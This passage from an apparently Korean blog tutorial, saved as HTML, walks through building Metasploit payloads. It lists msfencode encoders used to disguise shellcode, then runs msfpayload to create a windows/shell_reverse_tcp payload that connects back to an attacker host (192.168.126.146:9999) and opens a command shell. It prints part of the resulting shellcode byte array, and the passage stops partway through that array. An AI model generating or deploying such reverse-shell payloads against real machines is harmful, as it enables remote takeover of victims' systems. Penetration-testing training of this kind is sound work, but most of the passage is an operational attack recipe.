&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; -x &amp;lt;opt&amp;gt;&amp;nbsp; Specify an alternate executable template&lt;/SPAN&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;br /&gt;

&lt;TABLE style=&quot;BORDER-COLLAPSE: collapse&quot; cellSpacing=1 cellPadding=1 width=700 bgColor=#ffffff&gt;
&lt;TBODY&gt;
&lt;TR&gt;
&lt;TD style=&quot;BORDER-BOTTOM: #dadada 1px solid; BORDER-LEFT: #dadada 1px solid; BORDER-TOP: #dadada 1px solid; BORDER-RIGHT: #dadada 1px solid&quot; width=&quot;100%&quot;&gt;
&lt;P&gt;&lt;A href=&quot;mailto:root@LUCKYSTRIKE&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;root@LUCKYSTRIKE&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;:~# msfencode -l&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;Framework Encoders&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;==================&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Name&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Rank&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Description&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; ----&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ----&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; -----------&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; cmd/generic_sh&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; good&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Generic Shell Variable Substitution Command Encoder&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; cmd/ifs&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; low&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Generic ${IFS} Substitution Command Encoder&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; cmd/printf_php_mq&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; manual&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; printf(1) via PHP magic_quotes Utility Command Encoder&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; generic/none&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; normal&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; The &quot;none&quot; Encoder&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; mipsbe/longxor&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; normal&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; XOR Encoder&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; mipsle/longxor&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; normal&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; XOR Encoder&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; php/base64&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; great&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; PHP Base64 encoder&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; ppc/longxor&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; normal&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; PPC LongXOR Encoder&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; ppc/longxor_tag&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; normal&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; PPC LongXOR Encoder&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; sparc/longxor_tag&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; normal&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; SPARC DWORD XOR Encoder&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; x64/xor&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; normal&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; XOR Encoder&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; x86/alpha_mixed&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; low&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Alpha2 Alphanumeric Mixedcase Encoder&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; x86/alpha_upper&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; low&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Alpha2 Alphanumeric Uppercase Encoder&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; x86/avoid_utf8_tolower&amp;nbsp; manual&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Avoid UTF8/tolower&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; x86/call4_dword_xor&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; normal&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Call+4 Dword XOR Encoder&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; x86/context_cpuid&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; manual&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; CPUID-based Context Keyed Payload Encoder&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; x86/context_stat&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; manual&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; stat(2)-based Context Keyed Payload Encoder&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; x86/context_time&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; manual&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; time(2)-based Context Keyed Payload Encoder&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; x86/countdown&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; normal&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Single-byte XOR Countdown Encoder&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; x86/fnstenv_mov&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; normal&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Variable-length Fnstenv/mov Dword XOR Encoder&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; x86/jmp_call_additive&amp;nbsp;&amp;nbsp; normal&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Jump/Call XOR Additive Feedback Encoder&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; x86/nonalpha&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; low&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Non-Alpha Encoder&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; x86/nonupper&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; low&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Non-Upper Encoder&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; x86/shikata_ga_nai&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; excellent&amp;nbsp; Polymorphic XOR Additive Feedback Encoder&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; x86/single_static_bit&amp;nbsp;&amp;nbsp; manual&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Single Static Bit&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; x86/unicode_mixed&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; manual&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Alpha2 Alphanumeric Unicode Mixedcase Encoder&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; x86/unicode_upper&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; manual&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Alpha2 Alphanumeric Unicode Uppercase Encoder&lt;/SPAN&gt;&lt;br /&gt;
&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
payload&amp;nbsp;만드는데 필요한 명령 두가지와 encoder 리스트입니다.&lt;br /&gt;
msfpayload만 쓰셔도 되지만 특이한 경우에는 msfenocde도 사용해야하기 때문에 둘 다 언급했습니다.&lt;br /&gt;
&lt;br /&gt;다음은 msfpayload 명령을 사용해서 payload를 만드는 방식에 대한 예제입니다.&lt;br /&gt;
payload는 개인적으로 좋아라하는 windows/shell_reverse_tcp를 사용했습니다.&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;

&lt;TABLE style=&quot;BORDER-COLLAPSE: collapse&quot; cellSpacing=1 cellPadding=1 width=700 bgColor=#ffffff&gt;
&lt;TBODY&gt;
&lt;TR&gt;
&lt;TD style=&quot;BORDER-BOTTOM: #dadada 1px solid; BORDER-LEFT: #dadada 1px solid; BORDER-TOP: #dadada 1px solid; BORDER-RIGHT: #dadada 1px solid&quot; width=&quot;100%&quot;&gt;
&lt;P&gt;&lt;A href=&quot;mailto:root@LUCKYSTRIKE&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;root@LUCKYSTRIKE&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 &lt;/SPAN&gt;&lt;FONT color=#e31600&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;S&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Name: Windows Command Shell, Reverse TCP Inline&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Module: payload/windows/shell_reverse_tcp&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Version: 8642&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp; Platform: Windows&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Arch: x86&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;Needs Admin: No&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;Total size: 314&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Rank: Normal&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;Provided by:&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp; vlad902 &amp;lt;&lt;/SPAN&gt;&lt;A href=&quot;mailto:vlad902@gmail.com&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;vlad902@gmail.com&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;gt;&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp; sf &amp;lt;&lt;/SPAN&gt;&lt;A href=&quot;mailto:stephen_fewer@harmonysecurity.com&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;stephen_fewer@harmonysecurity.com&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;gt;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;Basic options:&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;Name&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Current Setting&amp;nbsp; Required&amp;nbsp; Description&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;----&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ---------------&amp;nbsp; --------&amp;nbsp; -----------&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;EXITFUNC&amp;nbsp; process&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; yes&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Exit technique: seh, thread, process, none&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;LHOST&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 192.168.126.146&amp;nbsp; yes&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; The listen address&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;LPORT&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 9999&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; yes&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; The listen port&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;Description:&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp; Connect back to attacker and spawn a command shell&lt;/SPAN&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;TABLE style=&quot;BORDER-COLLAPSE: collapse&quot; cellSpacing=1 cellPadding=1 width=700 bgColor=#ffffff&gt;
&lt;TBODY&gt;
&lt;TR&gt;
&lt;TD style=&quot;BORDER-BOTTOM: #dadada 1px solid; BORDER-LEFT: #dadada 1px solid; BORDER-TOP: #dadada 1px solid; BORDER-RIGHT: #dadada 1px solid&quot; width=&quot;100%&quot;&gt;&lt;A href=&quot;mailto:root@LUCKYSTRIKE&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;root@LUCKYSTRIKE&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 &lt;/SPAN&gt;&lt;FONT color=#e31600&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;C&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/SPAN&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt; &lt;/SPAN&gt;
&lt;P style=&quot;MARGIN: 0in; FONT-FAMILY: Consolas; FONT-SIZE: 10pt&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;/*&lt;/SPAN&gt;&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0in; FONT-FAMILY: Consolas; FONT-SIZE: 10pt&quot;&gt;&lt;SPAN style=&quot;mso-spacerun: yes&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;* windows/shell_reverse_tcp - 314 bytes&lt;/SPAN&gt;&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0in; FONT-FAMILY: Consolas; FONT-SIZE: 10pt&quot;&gt;&lt;SPAN style=&quot;mso-spacerun: yes&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;* &lt;/SPAN&gt;&lt;A href=&quot;http://www.metasploit.com/&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;http://www.metasploit.com&lt;/SPAN&gt;&lt;/A&gt;&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0in; FONT-FAMILY: Consolas; FONT-SIZE: 10pt&quot;&gt;&lt;SPAN style=&quot;mso-spacerun: yes&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;* VERBOSE=false, LHOST=192.168.126.146, LPORT=9999, &lt;/SPAN&gt;&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0in; FONT-FAMILY: Consolas; FONT-SIZE: 10pt&quot;&gt;&lt;SPAN style=&quot;mso-spacerun: yes&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;* ReverseConnectRetries=5, EXITFUNC=process, &lt;/SPAN&gt;&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0in; FONT-FAMILY: Consolas; FONT-SIZE: 10pt&quot;&gt;&lt;SPAN style=&quot;mso-spacerun: yes&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;* InitialAutoRunScript=, AutoRunScript=&lt;/SPAN&gt;&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0in; FONT-FAMILY: Consolas; FONT-SIZE: 10pt&quot;&gt;&lt;SPAN style=&quot;mso-spacerun: yes&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;*/&lt;/SPAN&gt;&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0in; FONT-FAMILY: Consolas; FONT-SIZE: 10pt&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;unsigned char buf[] = &lt;/SPAN&gt;&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0in; FONT-FAMILY: Consolas; FONT-SIZE: 10pt&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30&quot;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0in; FONT-FAMILY: Consolas; FONT-SIZE: 10pt&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff&quot;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0in; FONT-FAMILY: Consolas; FONT-SIZE: 10pt&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2&quot;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0in; FONT-FAMILY: Consolas; FONT-SIZE: 10pt&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85&quot;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0in; FONT-FAMILY: Consolas; FONT-SIZE: 10pt&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3&quot;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0in; FONT-FAMILY: Consolas; FONT-SIZE: 10pt&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d&quot;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0in; FONT-FAMILY: Consolas; FONT-SIZE: 10pt&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58&quot;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0in; FONT-FAMILY: Consolas; FONT-SIZE: 10pt&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b&quot;&lt;/SPAN&gt;&lt;/P&gt;
